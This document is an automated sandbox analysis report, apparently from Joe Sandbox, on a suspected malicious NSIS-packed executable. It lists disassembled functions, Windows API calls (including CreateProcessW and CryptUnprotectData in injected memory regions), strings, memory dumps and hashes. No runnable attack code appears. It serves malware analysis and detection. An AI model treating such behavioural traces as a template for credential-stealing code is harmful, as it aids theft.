Instruction ID: ef61c68cd4a6cc3a6f3726d4b558d534156d03c1c75d5f5b51cfe904c604fa23
Opcode Fuzzy Hash: 204806375d4f16312a37781d02af86e184349cdc68ded53cac09897120414cdc
Instruction Fuzzy Hash: A621B471948209AEEF049FA5DA4AABD7BB4EB44304F14443EF605B61D0D7B845409B18

Function 00405CBD Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403492,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75923420,004036EF,?,00000006,00000008,0000000A), ref: 00405CC3
CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403492,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75923420,004036EF,?,00000006,00000008,0000000A), ref: 00405CCD
lstrcatW.KERNEL32(?,0040A014,?,00000006,00000008,0000000A), ref: 00405CDF

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405CBD

Memory Dump Source

Source File: 00000000.00000002.2377710882.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2377693270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377730412.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377824191.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2CQ2zMn0hb.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-823278215
Opcode ID: cc3b6fad2320eb0d125534955cb1fe8af3638bf69e103b669ecb1462063790d4
Instruction ID: 595fb0ef6d3bfc82903baa2f142a0de03b6946227050b98ce465681b6cfad29b
Opcode Fuzzy Hash: cc3b6fad2320eb0d125534955cb1fe8af3638bf69e103b669ecb1462063790d4
Instruction Fuzzy Hash: AED0A771101630AAC111AB448D04CDF63ACEE45304342003BF601B70A2CB7C1D6287FD

Function 00405DC5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,00000400,00403576,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063F5

Part of subcall function 00405D68: CharNextW.USER32(?,?,00425F30,?,00405DDC,00425F30,00425F30,?,?,75922EE0,00405B1A,?,C:\Users\user\AppData\Local\Temp\,75922EE0,00000000), ref: 00405D76
Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D7B
Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D93

lstrlenW.KERNEL32(00425F30,00000000,00425F30,00425F30,?,?,75922EE0,00405B1A,?,C:\Users\user\AppData\Local\Temp\,75922EE0,00000000), ref: 00405E1E
GetFileAttributesW.KERNEL32(00425F30,00425F30,00425F30,00425F30,00425F30,00425F30,00000000,00425F30,00425F30,?,?,75922EE0,00405B1A,?,C:\Users\user\AppData\Local\Temp\,75922EE0), ref: 00405E2E

Strings

0_B, xrefs: 00405DCB

Memory Dump Source

Source File: 00000000.00000002.2377710882.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2377693270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377730412.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377824191.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2CQ2zMn0hb.jbxd

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
String ID: 0_B
API String ID: 3248276644-2128305573
Opcode ID: df6e64e4f6769b316d4c1c7beb25aaa03b2c49ca2ab4503c480f7fe4b4eab687
Instruction ID: e2ef3bf648e1011fa726b67e088789f036b8871ba300d86fb9c867912b04298b
Opcode Fuzzy Hash: df6e64e4f6769b316d4c1c7beb25aaa03b2c49ca2ab4503c480f7fe4b4eab687
Instruction Fuzzy Hash: B4F0F439109E5116D62233365D09BEF0548CF82354B5A853BFC91B22D2DB3C8A539DFE

Function 004059D1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426730,Error launching installer), ref: 004059FA
CloseHandle.KERNEL32(?), ref: 00405A07

Strings

Error launching installer, xrefs: 004059E4

Memory Dump Source

Source File: 00000000.00000002.2377710882.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2377693270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377730412.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377824191.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2CQ2zMn0hb.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: 6d78ed6c6b667bfe634139d4e18f22187190c1a967eebebbcf2d401a0833c7e8
Instruction ID: 166b032e71181ba573d10d742cd21a74b10ba840f41c43b266edefbe5b435367
Opcode Fuzzy Hash: 6d78ed6c6b667bfe634139d4e18f22187190c1a967eebebbcf2d401a0833c7e8
Instruction Fuzzy Hash: E5E04FB0A102097FEB009B64ED49F7B76ACFB04208F404531BD00F2150D774A8208A7C

Function 00403A43 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,75922EE0,00403A1A,75923420,00403819,00000006,?,00000006,00000008,0000000A), ref: 00403A5D
GlobalFree.KERNEL32(?), ref: 00403A64

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00403A55

Memory Dump Source

Source File: 00000000.00000002.2377710882.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2377693270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377730412.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377824191.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2CQ2zMn0hb.jbxd

Similarity

API ID: Free$GlobalLibrary
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 1100898210-823278215
Opcode ID: e06207bb45b670d34af272b3fb1259f6a40c1f68299225e6b4906b67dd7614d2
Instruction ID: 7abb624b42f0eb5bf3103b67fd66c27476adae564a61ccebc81435f3e7eba37d
Opcode Fuzzy Hash: e06207bb45b670d34af272b3fb1259f6a40c1f68299225e6b4906b67dd7614d2
Instruction Fuzzy Hash: 73E0EC326111205BC6229F59AD44B5E776D6F58B22F0A023AE8C07B26087745D938F98

Function 6F9710E1 Relevance: 5.1, APIs: 4, Instructions: 104memoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?), ref: 6F97116A
GlobalFree.KERNEL32(00000000), ref: 6F9711C7
GlobalFree.KERNEL32(00000000), ref: 6F9711D9
GlobalFree.KERNEL32(?), ref: 6F971203

Memory Dump Source

Source File: 00000000.00000002.2420870069.000000006F971000.00000020.00000001.01000000.00000004.sdmp, Offset: 6F970000, based on PE: true

Associated: 00000000.00000002.2420804552.000000006F970000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2420903221.000000006F974000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2420959726.000000006F976000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f970000_2CQ2zMn0hb.jbxd

Similarity

API ID: Global$Free$Alloc
String ID:
API String ID: 1780285237-0
Opcode ID: 2799d3495e0ce103bbea1acd6aac1bf2db844e11ca27266d6f0df0e9fbeb91ae
Instruction ID: e9ea9781b14d6339b3b7720445c5c5d966f4e8d37964a8c3b4f027e2926e748b
Opcode Fuzzy Hash: 2799d3495e0ce103bbea1acd6aac1bf2db844e11ca27266d6f0df0e9fbeb91ae
Instruction Fuzzy Hash: D63161B2908311DFEB708F78C965A6577E8FB57720700062AE948DB2D4EF35E8918B60

Function 00405E43 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E53
lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405E6B
CharNextA.USER32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E7C
lstrlenA.KERNEL32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E85

Memory Dump Source

Source File: 00000000.00000002.2377710882.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2377693270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377730412.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377824191.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2CQ2zMn0hb.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 7e71a0af936693ae9f9191b5a8beeb80aa55241a483ed2e2c495a4152d25f7df
Instruction ID: 3eb9f18af2c16f81f4dc7877ab3147293eaebe45f2d41041cd024b5e05e36bdf
Opcode Fuzzy Hash: 7e71a0af936693ae9f9191b5a8beeb80aa55241a483ed2e2c495a4152d25f7df
Instruction Fuzzy Hash: 4AF0C831100514AFC7029B94DD4099FBBA8DF06354B25407AE844FB211D634DF01AB98

Analysis Process: 2CQ2zMn0hb.exePID: 2672, Parent PID: 6568COMMON

Execution Graph

Execution Coverage:	11.1%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	4.4%
Total number of Nodes:	272
Total number of Limit Nodes:	26

Executed Functions

Function 001666B8 Relevance: 10.5, Strings: 8, Instructions: 457
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(o]q, xrefs: 001667B1
(o]q, xrefs: 001667DD
(o]q, xrefs: 001666F6
,aq, xrefs: 00166B58
(o]q, xrefs: 0016687A
,aq, xrefs: 00166B68
(o]q, xrefs: 00166BC7
(o]q, xrefs: 00166BD7

Memory Dump Source

Source File: 00000003.00000002.3283558363.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_160000_2CQ2zMn0hb.jbxd

Similarity

API ID:
String ID: (o]q$(o]q$(o]q$(o]q$(o]q$(o]q$,aq$,aq
API String ID: 0-1435242062
Opcode ID: e71507e08c3da2918d697906fe967e80bc0538e97a4003aa244e5ffff821537d
Instruction ID: e8f5e52e2b2953c63d735edec472311b93badc3c2384b8e9c79c99e116a80325
Opcode Fuzzy Hash: e71507e08c3da2918d697906fe967e80bc0538e97a4003aa244e5ffff821537d
Instruction Fuzzy Hash: A6127D30A00609DFCB14CF69D984AAEBBF6FF88314F158569E849EB265DB30ED51CB50

Function 001619B8 Relevance: 8.5, Strings: 6, Instructions: 969
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Xaq, xrefs: 00161A76
Xaq, xrefs: 00161B7C
Xaq, xrefs: 00162C95
Xaq, xrefs: 00161AB0
Xaq, xrefs: 00161B2F
Xaq, xrefs: 00162CBE

Memory Dump Source

Source File: 00000003.00000002.3283558363.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_160000_2CQ2zMn0hb.jbxd

Similarity

API ID:
String ID: Xaq$Xaq$Xaq$Xaq$Xaq$Xaq
API String ID: 0-499371476
Opcode ID: 2522a57f8b7a23caef53089114bc366b6b0297396e0958ab02a26fe34e33149c
Instruction ID: 9e9e96881825fe7c244583887e457e62831d8a4aa48d04654649fed7a6b5b9ee
Opcode Fuzzy Hash: 2522a57f8b7a23caef53089114bc366b6b0297396e0958ab02a26fe34e33149c
Instruction Fuzzy Hash: DA724D2960D3D29FDB224F305CFB595BFE09E4314476D0ADEE0C1660A3DAA987A9C313

Function 00165F90 Relevance: 6.7, Strings: 5, Instructions: 469
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(o]q, xrefs: 001661DA
(o]q, xrefs: 00166505
,aq, xrefs: 00166252
(o]q, xrefs: 001661E8
,aq, xrefs: 00166260

Memory Dump Source

Source File: 00000003.00000002.3283558363.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_160000_2CQ2zMn0hb.jbxd

Similarity

API ID:
String ID: (o]q$(o]q$(o]q$,aq$,aq
API String ID: 0-615190528
Opcode ID: da744473ceab79fcfd8f2cb53b8b563f372089c69d0db11dbba68bdae46d873d
Instruction ID: ec92719618b90807f9ccffd684469bb738f915649950b51fc308105c30eb1bb6
Opcode Fuzzy Hash: da744473ceab79fcfd8f2cb53b8b563f372089c69d0db11dbba68bdae46d873d
Instruction Fuzzy Hash: CE123C31A00219DFCB15CFA9DD94AAEBBF6FF89304F158069E805AB265DB30ED51CB50

Function 00164328 Relevance: 6.4, Strings: 5, Instructions: 196
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

0o@p, xrefs: 001643AA
Lj@p, xrefs: 0016452E
Lj@p, xrefs: 00164518
PH]q, xrefs: 00164590
PH]q, xrefs: 001645A1

Memory Dump Source

Source File: 00000003.00000002.3283558363.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_160000_2CQ2zMn0hb.jbxd

Similarity

API ID:
String ID: 0o@p$Lj@p$Lj@p$PH]q$PH]q
API String ID: 0-1229222154
Opcode ID: 4759b6b8ef89055f420e3598210a34dc2402abf38e5cd4186f16b42a46953ca5
Instruction ID: b3b5a7d52f8539e50fc1cad73c46142e6192d64608bfe2346ac4dc32f4730ea8
Opcode Fuzzy Hash: 4759b6b8ef89055f420e3598210a34dc2402abf38e5cd4186f16b42a46953ca5
Instruction Fuzzy Hash: 7091E774E00218DFDB18DFA9D984A9DBBF2BF89300F14C06AE809AB365DB349945CF50

Function 00168DA0 Relevance: 6.1, Strings: 4, Instructions: 1142COMMON

Download Yara Rule

Strings

4']q, xrefs: 00168DC4
4']q, xrefs: 00169AD3
(o]q, xrefs: 001694D8
4']q, xrefs: 00168ECC

Memory Dump Source

Source File: 00000003.00000002.3283558363.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_160000_2CQ2zMn0hb.jbxd

Similarity

API ID:
String ID: (o]q$4']q$4']q$4']q
API String ID: 0-875651895
Opcode ID: 79bfcda0152bd8f235ed1d61da63aa4e3343eb2befd0989ecc045001c64ebbcc
Instruction ID: ffc6931d1ab0ee11f5e198a91a1f9e8db39785ac29022e41154af7560d7da6a3
Opcode Fuzzy Hash: 79bfcda0152bd8f235ed1d61da63aa4e3343eb2befd0989ecc045001c64ebbcc
Instruction Fuzzy Hash: DEA28E71A04209DFCB15CFA8C994AAEBBF6BF88310F15856AE405DB361DB31ED51CB90

Function 37B6D608 Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 396
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

<0]4, xrefs: 37B6DAD0

Memory Dump Source

Source File: 00000003.00000002.3308770229.0000000037B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37b60000_2CQ2zMn0hb.jbxd

Similarity

API ID: DispatchMessage
String ID: <0]4
API String ID: 2061451462-2440276537
Opcode ID: 46924871a18cb2784ef6d6b61eabcc11bc5843cd89b35cc0e682323135f16a5a
Instruction ID: 3052bb0aea90b0cb9440f4b9c064bbd893d602e1aae93ecbfc0a7fd62794bfdd
Opcode Fuzzy Hash: 46924871a18cb2784ef6d6b61eabcc11bc5843cd89b35cc0e682323135f16a5a
Instruction Fuzzy Hash: 62F18B74A003089FEB04DFA9C888BADBBF1FF84358F148569E508BB265DB74E945CB40

Function 348A7628 Relevance: 2.0, APIs: 1, Instructions: 533COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3306527726.00000000348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 348A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_348a0000_2CQ2zMn0hb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 740ec5d58d5c989b854a359bb0942d56c06d5dbe01c87251bb11a197b2eb0445
Instruction ID: f3a958d456c5622d7c8ad109531d197d00f6924b344782ed6b0c2c10e981ce11
Opcode Fuzzy Hash: 740ec5d58d5c989b854a359bb0942d56c06d5dbe01c87251bb11a197b2eb0445
Instruction Fuzzy Hash: 84222774E00218CFDB14DFA8C890B9DBBB2BF88300F5486A9D409AB355DB75D986CF50

Function 37B6E7C8 Relevance: 2.0, Strings: 1, Instructions: 764COMMON

Download Yara Rule

Strings

Te]q, xrefs: 37B6F17D

Memory Dump Source

Source File: 00000003.00000002.3308770229.0000000037B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37b60000_2CQ2zMn0hb.jbxd

Similarity

API ID:
String ID: Te]q
API String ID: 0-52440209
Opcode ID: bc2f304ccb6b584eeb96362a77d4711ba1ef354b822c0bb923dfa6f4622beb8d
Instruction ID: c512b042494bf320930eefe8228232f4584100a94e26895cba9893095c14b198
Opcode Fuzzy Hash: bc2f304ccb6b584eeb96362a77d4711ba1ef354b822c0bb923dfa6f4622beb8d
Instruction Fuzzy Hash: BB82C174A01228CFDB25DF64D994BA9B7B2FF89300F1085E9D90967365CB35AE82CF44

Function 3763BDF0 Relevance: 2.0, Strings: 1, Instructions: 758COMMON

Download Yara Rule

Strings

Te]q, xrefs: 3763C796

Memory Dump Source

Source File: 00000003.00000002.3308592654.0000000037630000.00000040.00000800.00020000.00000000.sdmp, Offset: 37630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37630000_2CQ2zMn0hb.jbxd

Similarity

API ID:
String ID: Te]q
API String ID: 0-52440209
Opcode ID: a554dbcebaabaa4f51c6415d88becc079abade110435ed80829e1ea11b5f5cfa
Instruction ID: 475d6629a293f4074b9a0e6ea63568d3350b703b471dfce8d919d0b48cc5b0f7
Opcode Fuzzy Hash: a554dbcebaabaa4f51c6415d88becc079abade110435ed80829e1ea11b5f5cfa
Instruction Fuzzy Hash: 0072D274A01218CFDB25DF64D994BA9B7B2FF89301F1084E9D809673A5CB35AE82CF54

Function 348AD9D9 Relevance: 1.6, APIs: 1, Instructions: 57encryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(00000062,?,00000000,?,?,?,?), ref: 348ADA45

Memory Dump Source

Source File: 00000003.00000002.3306527726.00000000348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 348A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_348a0000_2CQ2zMn0hb.jbxd

Similarity

API ID: CryptDataUnprotect
String ID:
API String ID: 834300711-0
Opcode ID: d7779444ebf9d1f04c985b3f25a68a3664e5f32a8a4d43852ce443850f91f973
Instruction ID: 20589766eeee9bee068f40cbcd0cf7ad0790343576745dda56f5bd0ad6bef2fe
Opcode Fuzzy Hash: d7779444ebf9d1f04c985b3f25a68a3664e5f32a8a4d43852ce443850f91f973
Instruction Fuzzy Hash: 7E115BB6800249DFCB10CF99C944BDEBFF5EF88320F148419E659A7211C379A590DFA1

Function 348AD1EC Relevance: 1.6, APIs: 1, Instructions: 55encryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(00000062,?,00000000,?,?,?,?), ref: 348ADA45

Memory Dump Source

Source File: 00000003.00000002.3306527726.00000000348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 348A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_348a0000_2CQ2zMn0hb.jbxd

Similarity

API ID: CryptDataUnprotect
String ID:
API String ID: 834300711-0
Opcode ID: c601a3e41a31957c8654277920f201d7b791b3ddfc58830763b89021be840b01
Instruction ID: 5bfc6b385a1c4dad9c131a612b6edf6da5a2a509595b77d46ef10108bc9f4fd3
Opcode Fuzzy Hash: c601a3e41a31957c8654277920f201d7b791b3ddfc58830763b89021be840b01
Instruction Fuzzy Hash: 481147B28002499FCB10CF99C405BEEBBF5EB48320F148419E618A7210C379A590CFA1

Function 348A0C1A Relevance: 1.5, Strings: 1, Instructions: 222COMMON

Download Yara Rule

Strings

]4, xrefs: 348A0C99

Memory Dump Source

Source File: 00000003.00000002.3306527726.00000000348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 348A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_348a0000_2CQ2zMn0hb.jbxd

Similarity

API ID:
String ID: ]4
API String ID: 0-1124688747
Opcode ID: 4bf9123073ee0a62932c5fc1975718982a6e496253bfe2e03400dc8ff1b32c68
Instruction ID: 43da0689a0a2c8e227babe408f7052b943e226f3e3a0af804ce51e27c500b445
Opcode Fuzzy Hash: 4bf9123073ee0a62932c5fc1975718982a6e496253bfe2e03400dc8ff1b32c68
Instruction Fuzzy Hash: 12A10374E00208CFEB14DFA9C594BDDBBB1FF89304F209269E408AB2A1DB759985CF55

Function 348A0C28 Relevance: 1.5, Strings: 1, Instructions: 220COMMON

Download Yara Rule

Strings

]4, xrefs: 348A0C99

Memory Dump Source

Source File: 00000003.00000002.3306527726.00000000348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 348A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_348a0000_2CQ2zMn0hb.jbxd

Similarity

API ID:
String ID: ]4
API String ID: 0-1124688747
Opcode ID: 529e3d0fcd8d6853f546c33dce7a6f642e35c1c5445d21342c977b83346684dc
Instruction ID: c483132f9f0055b87aa2c3ae6ad76ddadae17d6156aeb45fb2da7d8163da3fc2
Opcode Fuzzy Hash: 529e3d0fcd8d6853f546c33dce7a6f642e35c1c5445d21342c977b83346684dc
Instruction Fuzzy Hash: C5A1F274D00208CFEB14DFA9C994BDDBBB1FF89314F208269E408AB2A1DB749985CF55

Function 37639D10 Relevance: 1.5, Strings: 1, Instructions: 219COMMON

Download Yara Rule

Strings

0^7, xrefs: 37639FF0

Memory Dump Source

Source File: 00000003.00000002.3308592654.0000000037630000.00000040.00000800.00020000.00000000.sdmp, Offset: 37630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37630000_2CQ2zMn0hb.jbxd

Similarity

API ID:
String ID: 0^7
API String ID: 0-4112476546
Opcode ID: 406f7d396131f99d0cd09faec26f457fdba45ae24a950f5f995914f71199a6b2
Instruction ID: ef98122db19ca78e27230633aad149dc8e1bbc1a9d9db4c0a57c76a545434e03
Opcode Fuzzy Hash: 406f7d396131f99d0cd09faec26f457fdba45ae24a950f5f995914f71199a6b2
Instruction Fuzzy Hash: B6A1A0B4E012288FEB14CF6AC954B9DBBF2BF89304F14C1AAD408A7261DB345A85CF11

Function 3763A360 Relevance: 1.5, Strings: 1, Instructions: 219COMMON

Download Yara Rule

Strings

0^7, xrefs: 3763A640

Memory Dump Source

Source File: 00000003.00000002.3308592654.0000000037630000.00000040.00000800.00020000.00000000.sdmp, Offset: 37630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37630000_2CQ2zMn0hb.jbxd

Similarity

API ID:
String ID: 0^7
API String ID: 0-4112476546
Opcode ID: a397d8086f8fd8419bb908b045406726049f92301206bfa13ef86e576361331b
Instruction ID: a0212d45daefdb374950a94431632c6c63d5338850319a3c969012a12f5965aa
Opcode Fuzzy Hash: a397d8086f8fd8419bb908b045406726049f92301206bfa13ef86e576361331b
Instruction Fuzzy Hash: EBA191B5E012188FEB14CF6AC994B9DFBF2AF89310F14C0AAD408B7265DB345A85CF51

Function 376396C8 Relevance: 1.5, Strings: 1, Instructions: 218COMMON

Download Yara Rule

Strings

0^7, xrefs: 376399A4

Memory Dump Source

Source File: 00000003.00000002.3308592654.0000000037630000.00000040.00000800.00020000.00000000.sdmp, Offset: 37630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37630000_2CQ2zMn0hb.jbxd

Similarity

API ID:
String ID: 0^7
API String ID: 0-4112476546
Opcode ID: e18734d3a15a80fcf1ca3b4db71289307d636e023cc5564b4dc5973e5082230a
Instruction ID: 24931c68861761fb757d6cbff779fd26724d51a0b9885724cd3fae684d0628a6
Opcode Fuzzy Hash: e18734d3a15a80fcf1ca3b4db71289307d636e023cc5564b4dc5973e5082230a
Instruction Fuzzy Hash: 8BA190B5E012188FEB58CF6AC944B9DBBF2BF89304F14C1AAD409A7265DB345A85CF11

Function 3763A9B0 Relevance: 1.5, Strings: 1, Instructions: 218COMMON

Download Yara Rule

Strings

0^7, xrefs: 3763AC8B

Memory Dump Source

Source File: 00000003.00000002.3308592654.0000000037630000.00000040.00000800.00020000.00000000.sdmp, Offset: 37630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37630000_2CQ2zMn0hb.jbxd

Similarity

API ID:
String ID: 0^7
API String ID: 0-4112476546
Opcode ID: 244d7555895a5c725333bc3c7376eb4a6003f96c1a331a874e1d4605a2fc3b40
Instruction ID: 562f8c7ede6ba06fa3ab8c5d4c90ebf0ceb605cdb7f333e2add761ab253d5b73
Opcode Fuzzy Hash: 244d7555895a5c725333bc3c7376eb4a6003f96c1a331a874e1d4605a2fc3b40
Instruction Fuzzy Hash: 0FA180B4E012188FEB54CF6AC994B9DBBF2BF89300F14C1AAD409B7265DB345A85CF51

Function 3763A9A0 Relevance: 1.4, Strings: 1, Instructions: 173COMMON

Download Yara Rule

Strings

0^7, xrefs: 3763AC8B

Memory Dump Source

Source File: 00000003.00000002.3308592654.0000000037630000.00000040.00000800.00020000.00000000.sdmp, Offset: 37630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37630000_2CQ2zMn0hb.jbxd

Similarity

API ID:
String ID: 0^7
API String ID: 0-4112476546
Opcode ID: e39696fec129c8714e33864c385951ff09841365e5bd120c94bc7310057e7555
Instruction ID: c8cd44b657db8da42ab67dea468fe1314a11bd6133e43cc31d5be62bc01b0634
Opcode Fuzzy Hash: e39696fec129c8714e33864c385951ff09841365e5bd120c94bc7310057e7555
Instruction Fuzzy Hash: 0E8194B4E016188FEB58CF6AC954B9DFBF2AF89200F14C1EAD40DA7265DB345A85CF11

